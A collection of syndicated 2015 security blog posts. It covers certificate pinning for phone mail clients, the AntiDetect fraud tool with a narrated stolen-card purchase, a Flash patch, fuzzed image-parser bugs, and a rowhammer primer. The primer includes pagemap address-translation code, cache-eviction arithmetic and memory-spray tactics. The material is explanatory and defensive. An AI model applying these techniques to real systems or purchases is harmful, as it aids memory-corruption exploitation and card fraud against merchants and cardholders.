Have you found other tools that help make your Google Apps experience more efficient and powerful? If so, share with your fellow Linux.com readers in the comments.

SANS Internet Storm Center, InfoCON: green: Pin-up on your Smartphone!, (Thu, Mar 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Yeah, okay, I admit that headline is cheap click bait. Originally, it said "Certificate Pinning on Smartphones". If you are more interested in pin-ups on your smartphone, I fear you'll have to look elsewhere :).

Recently, an email provider that I use changed their Internet-facing services completely. I hadn't seen any announcement that this would happen, and the provider likely thought that since the change was transparent to the customer, no announcement was needed. But I'm probably a tad more paranoid than their normal customers, and am watching what my home WiFi/DSL is talking to on the Internet. On that day, some device in my home started speaking IMAPS with an IP address block that I had never seen before. Before I even checked which device it was, I pulled a quick traffic capture to look at the SSL certificate exchange, where I did recognize the domain name, but not the Certificate Authority. Turns out, as part of the change, the provider had also changed their SSL certificates, even including the certificate issuer (CA).

And my mobile phone, which happened to be the device doing the talking? It hadn't even blinked! It had happily synchronized my mail, and sent my IMAP login information across this session, all day long.

Since I travel often, and am potentially using my phone in less-than-honest locations and nations, it is quite evident that this setup is pretty exposed to a man in the middle attack (MitM). Ironically, the problem would be almost trivial to solve in software, all that is needed is to store the fingerprint of the server certificate locally on the phone, and to stop and warn the user whenever that fingerprint changes. This approach is called Certificate Pinning or Key continuity, and OWASP has a great write-up that explains how it works.
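
To make the idea concrete, here is a small Python sketch of pinning; the mail host and the pinned value are placeholders, and this illustrates the approach described above rather than anyone's production code. Fetch the server's certificate, hash it, and refuse to continue if the hash no longer matches the fingerprint you stored the first time around.

    # Minimal sketch of certificate pinning. The hostname and the pinned
    # fingerprint are placeholders; record the real fingerprint on first use.
    import hashlib, socket, ssl

    PINNED_SHA256 = "known-good-fingerprint-recorded-earlier"

    def server_cert_fingerprint(host, port=993):             # 993 = IMAPS
        ctx = ssl.create_default_context()
        with socket.create_connection((host, port)) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                der = tls.getpeercert(binary_form=True)       # raw DER certificate
        return hashlib.sha256(der).hexdigest()

    fingerprint = server_cert_fingerprint("imap.example.com")
    if fingerprint != PINNED_SHA256:
        raise SystemExit("Certificate changed - possible MitM, refusing to log in")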

Problem is .. this is only marginally supported in most implementations, and what little support there is, is often limited to HTTPS (web). In other words, all those billions of smart phones which happily latch onto whatever known WiFi or mobile signal is to be had nearby, will just as happily connect to what they think is their mail server, and provide the credentials. And whoever ends up with these credentials, will have access for a while .. or when was the last time YOU changed your IMAP password?

If you wonder how this differs from any other man in the middle (MitM) attack … well, with a MitM in the web browser, the user is actively involved in the connection, and at least stands *some* chance of detecting what is going on. With the mobile phone polling for email, though, this happens both automatically and very frequently, so even with the phone in the pocket, and a MitM that is only active for five minutes, a breach can occur. And with the pretty much monthly news that some trusted certificate authority mistakenly issued a certificate for someone else's service, well, my mobile phone's childishly naïve readiness to talk to strangers definitely isn't good news.

While certificate pinning would not completely eliminate this risk, it certainly would remove the most likely attack scenarios. Some smartphones have add-on apps that promise to help with pinning, but in my opinion, the option to pin the certificate on email send/receive is a feature that should come as a standard part of the native email clients on all smartphones. Which we probably should be calling Dumbphones or Naïvephones, until they actually do provide this functionality.

If your smartphone has native certificate pinning support on imap/pop/smtp with any provider (not just Chrome/GMail), or you managed to configure it in a way that it does, please share in the comments below.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: ‘AntiDetect’ Helps Thieves Hide Digital Fingerprints

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

As a greater number of banks in the United States shift to issuing more secure credit and debit cards with embedded chip technology, fraudsters are going to direct more of their attacks against online merchants. No surprise, then, that thieves increasingly are turning to an emerging set of software tools to help them evade fraud detection schemes employed by many e-commerce companies.

Every browser has a relatively unique “fingerprint” that is shared with Web sites. That signature is derived from dozens of qualities, including the computer’s operating system type, various plugins installed, the browser’s language setting and its time zone. Banks can leverage fingerprinting to flag transactions that occur from a browser the bank has never seen associated with a customer’s account.

Payment service providers and online stores often use browser fingerprinting to block transactions from browsers that have previously been associated with unauthorized sales (or a high volume of sales for the same or similar product in a short period of time).
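
As a rough illustration of the concept (and only that; real fraud-detection systems use far more signals and are not public), a coarse server-side fingerprint can be as simple as hashing a handful of request attributes together:

    # Toy illustration of browser fingerprinting on the server side.
    # Real systems combine many more signals (canvas, fonts, plugin lists, etc.).
    import hashlib

    def coarse_fingerprint(headers, client_hints):
        signals = [
            headers.get("User-Agent", ""),
            headers.get("Accept-Language", ""),
            client_hints.get("timezone", ""),
            client_hints.get("screen_resolution", ""),
            ",".join(client_hints.get("plugins", [])),
        ]
        return hashlib.sha256("|".join(signals).encode("utf-8")).hexdigest()

    # The same browser setup hashes to the same value on every visit; change
    # the user agent or time zone (as Antidetect does) and the hash changes.
    print(coarse_fingerprint(
        {"User-Agent": "Mozilla/5.0 ...", "Accept-Language": "en-US"},
        {"timezone": "America/Toronto", "screen_resolution": "1920x1080",
         "plugins": ["Flash 17.0"]},
    ))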

In January, several media outlets wrote about a crimeware tool called FraudFox, which is marketed as a way to help crooks sidestep browser fingerprinting. However, FraudFox is merely the latest competitor to emerge in a fairly established marketplace of tools aimed at helping thieves cash out stolen cards at online merchants.

Another fraudster-friendly tool that's been around on the underground hacker forums even longer is called Antidetect. Currently in version 6.0.0.1, Antidetect allows users to very quickly and easily change components of their system to avoid browser fingerprinting, including the browser type (Safari, IE, Chrome, etc.), version, language, user agent, Adobe Flash version, number and type of other plugins, as well as operating system settings such as OS and processor type, time zone and screen resolution.

Antidetect is marketed to fraudsters involved in ripping off online stores.

The seller of this product shared the video below of someone using Antidetect along with a stolen credit card to buy three different downloadable software titles from gaming giant Origin.com. That video has been edited for brevity and to remove sensitive information; my version also includes captions to describe what’s going on throughout the video.

In it, the fraudster uses Antidetect to generate a fresh, unique browser configuration, and then uses a bundled tool that makes it simple to proxy communications through one of hundreds of compromised systems around the world. He picks a proxy in Ontario, Canada, and then changes the time zone on his virtual machine to match Ontario's.

Then our demonstrator goes to a carding shop and buys a credit card stolen from a woman who lives in Ontario. After he checks to ensure the card is still valid, he heads over to Origin.com and uses the card to buy more than $200 in downloadable games that can be easily resold for cash. When the transactions are complete, he uses Antidetect to create a new browser configuration and restarts the entire process, which takes about five minutes from browser generation and proxy configuration to selecting a new card and purchasing software with it. Click the icon in the bottom right corner of the video player for the full-screen version.

I think it’s safe to say we can expect to see more complex anti-fingerprinting tools come on the cybercriminal market as fewer banks in the United States issue chipless cards. There is also no question that card-not-present fraud will spike as more banks in the US issue chipped cards; this same increase in card-not-present fraud has occurred in virtually every country that made the chip card transition, including Australia, Canada, France and the United Kingdom. The only question is: Are online merchants ready for the coming e-commerce fraud wave?

Krebs on Security: Adobe Flash Update Plugs 11 Security Holes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe has released an update for its Flash Player software that fixes at least 11 separate, critical security vulnerabilities in the program. If you have Flash installed, please take a moment to ensure your systems are updated.

Not sure whether your browser has Flash installed or what version it may be running? Browse to this link. The newest, patched version is 17.0.0.134 for Windows and Mac users. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to version 17.0.0.134.

The most recent versions of Flash should be available from the Flash home page, but beware of potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera).

The last few Flash updates from Adobe have been in response to zero-day threats targeting previously unknown vulnerabilities in the program. But Adobe says it is not aware of any exploits in the wild for the issues addressed in this update. Adobe’s advisory on this patch is available here.

lcamtuf's blog: Another round of image bugs: PNG and JPEG XR

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

Today’s release of MS15-024 and MS15-029 addresses two more image-related memory disclosure vulnerabilities in Internet Explorer – this time affecting the little-known JPEG XR format supported by this browser, plus the far more familiar PNG. Similarly to the previously discussed bugs in MSIE TIFF and JPEG parsing, and to the BMP, ICO, and GIF and JPEG DHT & SOS flaws in Firefox and Chrome, these two were found with afl-fuzz. The earlier posts have more context – today, just enjoy some pretty pics showing subsequent renderings of the same JPEG XR image.

Proof-of-concepts are here (JXR) and here (PNG). I am happy to report that Microsoft fixed them within roughly three months of the original report.

The total number of bugs squashed in this category is now ten. I have just one more multi-browser image parsing bug outstanding – but it should be an interesting one. Stay tuned.

Errata Security: Some notes on DRAM (#rowhammer)

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

My twitter feed is full of comments about the “rowhammer” exploit. I thought I’d write some quick notes about DRAM. The TL;DR version is this: you probably don’t need to worry about this, but we (the designers of security and of computer hardware/software) do.

There are several technologies for computer memory. The densest, and hence cheapest-per-bit, is “DRAM”. It consists of a small capacitor for each bit of memory. The thing about capacitors is that they lose their charge over time and must be refreshed. In the case of DRAM, every bit of memory must be read and then re-written every 64 milliseconds or it becomes corrupt.

These tiny capacitors are prone to corruption from other sources. One common source of corruption is cosmic rays. Another source is small amounts of radioactive elements in the materials used to construct memory chips. So, chips must be built with radioactive-free materials. The banana you eat has more radioactive material inside it than your DRAM chips.

The upshot is that capacitors are unreliable (albeit extremely cheap) technology for memory which readily get corrupted for a lot of reasons. This “rowhammer” exploit works by corrupting the capacitors by overwriting adjacent rows hundreds of thousands of times, hoping that some bits randomly flip. Like cosmic rays or radioactive hits, this only changes the temporary value within the cell, but has no permanent effect.
Because of this unreliability in capacitors, servers use ECC or error-correcting memory. This adds extra memory chips, so that 72 bits are read for every 64 bits of desired memory. If any single bit is flipped, the additional eight bits can be used to correct it.
The upshot of ECC memory is that it should also detect and correct rowhammer bit-flips just as well as cosmic-ray bit-flips. The problem is that ECC memory costs more. The memory itself is about 30% more expensive (although it contains only 12% more chips). A non-ECC 8-gigabyte DIMM costs $60 right now, whereas an ECC equivalent costs $80. The CPUs and motherboards that use ECC memory are also slightly more expensive. Update: see below.
Note that the hacker doesn’t have complete control over which bits will be flipped. They are highly likely to flip the wrong bits and crash the system rather than gain exploitation. However, hackers have lots of ways of mitigating this. For example, as described in the Google post, hackers can do a memory spray. They can allocate a large amount of memory, and then set it up so that no matter which bits get flipped, the resulting value will still point to something valid.
The upshot is that while this problem seems as random as cosmic rays, one should realize that hackers can control things better than it would appear. Historically, bugs like stack and heap overflows were once considered too random for hackers to predict, but they were then proven to be solidly predictable. Likewise, address space layout randomization was a technique designed to stop hackers, which they then started using memory spray to defeat.
DRAM capacitors are arranged in a rectangular grid or bank. A chip will have multiple banks (usually eight of them). Banks are rectangular rather than square, with more rows than columns. Rows are usually 1024 bits wide, so increasing capacity usually means increasing the number of rows. (The wider the row, the slower the access).
My computer has 16 gigabytes of RAM. It uses two channels, with two DIMMs per channel. Each DIMM is double-sided, which means it has two ranks. Each rank has eight chips acting together to produce 64 bits at a time (or 8 bytes). Each chip in a rank has eight banks. Each bank has 32k rows and 1k columns. Thus, an address might be broken down as follows:
  3 3 3 3 3 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1 
  4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |C|D|R|bank | row                           | column            |x x x|
 +-+++++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | | |
  | | +-- rank
  | +---- DIMM
  +------ channel
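
Using the field sizes described above (2 channels, 2 DIMMs per channel, 2 ranks, 8 banks, 32k rows, 1k columns, 8 bytes per access), a naive, non-interleaved decode of such a physical address would look roughly like the sketch below; it mirrors the diagram, not any real memory controller.

    # Sketch of the naive (non-interleaved) address split described above.
    # Real memory controllers permute these bits for performance.
    def decode_physical_address(addr):
        return {
            "byte":    addr & 0x7,             # 3 bits: byte within the 8-byte access
            "column":  (addr >> 3)  & 0x3FF,   # 10 bits: 1k columns
            "row":     (addr >> 13) & 0x7FFF,  # 15 bits: 32k rows
            "bank":    (addr >> 28) & 0x7,     # 3 bits: 8 banks
            "rank":    (addr >> 31) & 0x1,     # 2 ranks per DIMM
            "dimm":    (addr >> 32) & 0x1,     # 2 DIMMs per channel
            "channel": (addr >> 33) & 0x1,     # 2 channels
        }

    print(decode_physical_address(0x2C0001238))
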
In practice, though, this precise arrangement would be inefficient. If physical addresses were truly laid out this way, then the second memory channel would only be used for the upper half of physical memory. For better performance, you want to interleave memory access, so that on average, half of all memory accesses are on one channel, and the other half on the other channel. Likewise, for best performance, you want to interleave access among the DIMMs, ranks, banks, and rows. However, you don’t want to interleave column access: once a row is open on a particular bank, it’s most efficient to read sequentially from that row.
The upshot is that for optimal performance, the memory controller will rearrange the physical addresses (except for the column portion). Knowledge of how the memory controller does this is needed for robust exploitation of this bug. In today’s systems, the memory controller is built into the CPU, so exploitation will be different depending upon which CPU a system has.
In today’s computers, software doesn’t use physical addresses to access memory. Instead, it uses virtual addresses. This virtual memory means that when a bug causes a program to crash, it doesn’t corrupt the memory of other programs, or the memory of the operating system. This is also a security feature, preventing one user account from meddling with another. (Indeed, rowhammer’s goal is to bypass this security feature.) In old computers, this was also used to trick applications into thinking they had more virtual memory than physical memory in the system. Infrequently used blocks of memory would be removed from physical memory and saved to disk, and would automatically be read back into the system as needed.
Individual addresses aren’t mapped on a one-to-one basis. Instead, the translation is done one page of 4096 addresses at a time. It’s the operating system kernel that manages these page tables to create the mappings, and it’s the CPU hardware that uses the page tables to do the translations automatically.
The upshot of this is that in order to exploit this bug, the hacker needs to know how virtual memory is translated to physical memory. This is easy on Linux, where a pseudo file /proc/PID/pagemap exists that contains this mapping. It may be harder in other systems.
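
Here is a short sketch of what reading that pseudo file involves; note that recent kernels hide the frame number from unprivileged processes, so this generally needs root.

    # Sketch of translating a virtual address via /proc/self/pagemap on Linux.
    # Recent kernels zero the frame number unless the process runs as root.
    import os, struct

    PAGE_SIZE = os.sysconf("SC_PAGE_SIZE")

    def virt_to_phys(vaddr):
        with open("/proc/self/pagemap", "rb") as f:
            f.seek((vaddr // PAGE_SIZE) * 8)        # one 64-bit entry per page
            entry = struct.unpack("<Q", f.read(8))[0]
        if not (entry >> 63) & 1:                    # bit 63: page present in RAM
            return None
        pfn = entry & ((1 << 55) - 1)                # bits 0-54: page frame number
        return pfn * PAGE_SIZE + (vaddr % PAGE_SIZE)
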
Hypervisors hosting virtual machines (VMs) use yet another layer of page tables. Unlike operating systems, hypervisors don’t expose the physical mapping to the virtual machines. The upshot of this is that people running VMs in the cloud do not have to worry about other customers using this technique to hack them. It’s probably not a concern anyway, since most cloud systems use error correcting memory, but the VM translation makes it extra hard to crack.
Thus, the only real vector of exploitation is where a hostile person can run native code on a system. There are some cheap hosting environments where this is possible, running cheap servers without ECC memory, with separate user accounts instead of using virtual machines. However, such environments tend to be so riddled with holes that there are likely easier routes to exploitation than this one.
The biggest threat at the moment appears to be to desktops/laptops, because they have neither ECC memory nor virtual machines. In particular, there seems to be a danger with Google’s Native Client (NaCl) code execution. This is a clever sandbox that allows the running of native code within the Chrome browser, so that web pages can run software as fast as native software on the system. This memory corruption defeats one level of protection in NaCl. Nobody has yet demonstrated how to use this technique in practice to fully defeat NaCl, but it’s likely somebody will discover a way eventually. In the meantime, it’s likely Google will update Chrome to defeat this, such as by getting rid of the cache flush operation that forces memory overwrites.
The underlying issue is an analog one. It’s not a bug in the code, or in the digital design of the chips, but a problem at a deeper layer. Rowhammer is not the first to exploit issues like this. For example, I own domains that are one bit different from Google’s as a form of bit-squatting, with traffic arriving on my domain when a bit-flip causes a domain name to change, such as when “google.com” becomes “foogle.com”. Travis Goodspeed’s packet-in-packet work shows the flaw when bits (well, symbols) get flipped in radio waves.

Update: This is really just meant as a primer, as background on the issue, not really trying to derive any conclusions. I chatted a bit with Chris Evans (@scarybeasts) from Google about some of those conclusions, so I thought I’d expand a bit on them.

Does ECC protect you? Maybe not. While it will correct single bit flips most of the time, it won’t protect when multiple bits flip at once. The hacker may be able to achieve this with enough tries. Remember: the hacker’s code can keep retrying this until it succeeds, even if that takes hours. Since ECC is correcting the memory, nothing will crash. You won’t see anything wrong except high CPU usage — until the hacker eventually gets multiple bit-flips, and either the system crashes or the hacker gets successful exploitation. I forget the exact details. I think Intel CPUs correct single bit errors, crash on two bit errors, and that three bit errors might go through. Also, this would depend upon the percentage of time that the hacker can successfully get two/three bit flips instead of a single one.

By itself, this bug may not endanger you. However, it’s much more dangerous when used in conjunction with other bugs. Browsers have “sandboxes” that keep hackers contained even if the first layer of defense breaks. This may provide a way of escaping the sandbox (a sandbox escape) when used in conjunction with other exploits.

Cache eviction is pretty predictable and may be exploitable from JavaScript even without access to the cache-flush instruction. Intel has a 32-kilobyte L1 cache for data. This is divided into 64 sets, each holding 8 items in a set, with each item being a 64 byte cache-line (64 times 8 times 64 equals 32k). Using JavaScript, one could easily create an array of bytes just long enough to force accessing 9 items in a set — thus forcing the least-recently-used chunk to be flushed out to memory. Well, it gets tricky, because the L1 cache lines get bumped down to L2 cache, which get bumped down to L3, so code would have to navigate the entire cache hierarchy, which changes per processor. But it’s probably doable, meaning that a JavaScript program may be able to cause havoc with the system.
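
As a back-of-the-envelope sketch of that arithmetic (the constants match the 32-kilobyte, 8-way, 64-byte-line cache described above), addresses spaced 4 kilobytes apart all land in the same set, so touching nine of them evicts one:

    # Which set of a 32 KB, 8-way L1 data cache an address falls into:
    # 64 sets x 8 ways x 64-byte lines = 32 KB.
    LINE, SETS, WAYS = 64, 64, 8

    def l1_set(addr):
        return (addr // LINE) % SETS     # bits 6-11 of the address pick the set

    # Nine addresses spaced SETS * LINE = 4096 bytes apart map to one set,
    # so accessing all of them forces the least-recently-used line out.
    base = 0x100000
    conflict = [base + i * SETS * LINE for i in range(WAYS + 1)]
    assert len({l1_set(a) for a in conflict}) == 1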

I misread the paper. It says that Chrome’s NaCl already removed the cache-flush operation a while ago, so Chrome is “safe”. However, I wonder whether that cache eviction strategy might work.